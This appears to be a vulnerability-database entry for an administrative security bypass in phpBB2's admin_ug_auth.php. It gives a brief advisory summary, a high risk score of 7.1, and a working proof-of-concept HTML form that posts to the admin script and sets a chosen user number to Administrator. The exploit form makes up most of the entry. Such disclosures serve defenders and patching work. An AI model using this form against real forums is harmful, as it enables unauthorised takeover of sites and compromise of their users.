PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerabilit


                                                source: http://www.securityfocus.com/bid/22730/info

PHPBB2 is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access.

Successful exploits may result in a complete compromise of vulnerable applications. 

&#60;html&#62;
&#60;head&#62;
&#60;/head&#62;
&#60;body&#62;

&#60;form method=&#34;post&#34;
action=&#34;www.example.com/board_directory/admin/admin_ug_auth.php&#34;&#62;
User Level: &#60;select name=&#34;userlevel&#34;&#62;
&#60;option value=&#34;admin&#34;&#62;Administrator&#60;/option&#62;
&#60;option value=&#34;user&#34;&#62;User&#60;/option&#62;&#60;/select&#62;
&#60;input type=&#34;hidden&#34; name=&#34;private[1]&#34; value=&#34;0&#34;&#62;
&#60;input type=&#34;hidden&#34; name=&#34;moderator[1]&#34; value=&#34;0&#34;&#62;
&#60;input type=&#34;hidden&#34; name=&#34;mode&#34; value=&#34;user&#34;&#62;
&#60;input type=&#34;hidden&#34; name=&#34;adv&#34; value=&#34;&#34;&#62;
User Number: &#60;input type=&#34;text&#34; name=&#34;u&#34; size=&#34;5&#34;&#62;
&#60;input type=&#34;submit&#34; name=&#34;submit&#34; value=&#34;Submit&#34;&#62;

&#60;/form&#62;
&#60;/body&#62;
&#60;/html&#62;

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1